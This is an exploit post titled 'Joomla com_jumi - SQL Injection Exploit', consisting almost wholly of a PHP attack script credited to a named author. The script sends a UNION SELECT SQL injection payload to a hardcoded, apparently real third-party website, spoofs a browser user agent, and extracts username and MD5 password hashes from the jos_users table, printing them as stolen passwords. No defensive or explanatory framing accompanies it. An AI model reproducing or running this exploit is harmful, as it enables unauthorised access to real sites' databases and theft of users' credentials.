Joomla com_jumi - SQL Injection Exploit
Posted on 30 November -0001
<HTML><HEAD><TITLE>Joomla com_jumi - SQL Injection Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY><?php #Author: Mateus a.k.a Dctor - Hatbash br #fb : facebook.com/hatbashbr/ $host = "http://www.building.lv/"; $payload = "index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+"; $u = $host.$payload; $random= array( 'http'=>array( 'method'=>"GET", 'header'=>"Accept-language: en " . "Cookie: foo=bar " . "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1 " )); $agent= stream_context_create($random); $p = file_get_contents($u, false, $agent); if(preg_match_all('/([0-9a-fA-F]{32})/', $p, $r)){ $string = implode(", ", $r['0']); echo "[+] Target: ".$host ." "; echo "[+] Passwords : "; echo "�33[01;31m" .$string. " "; } else{echo "Not Vull";} ?></BODY></HTML>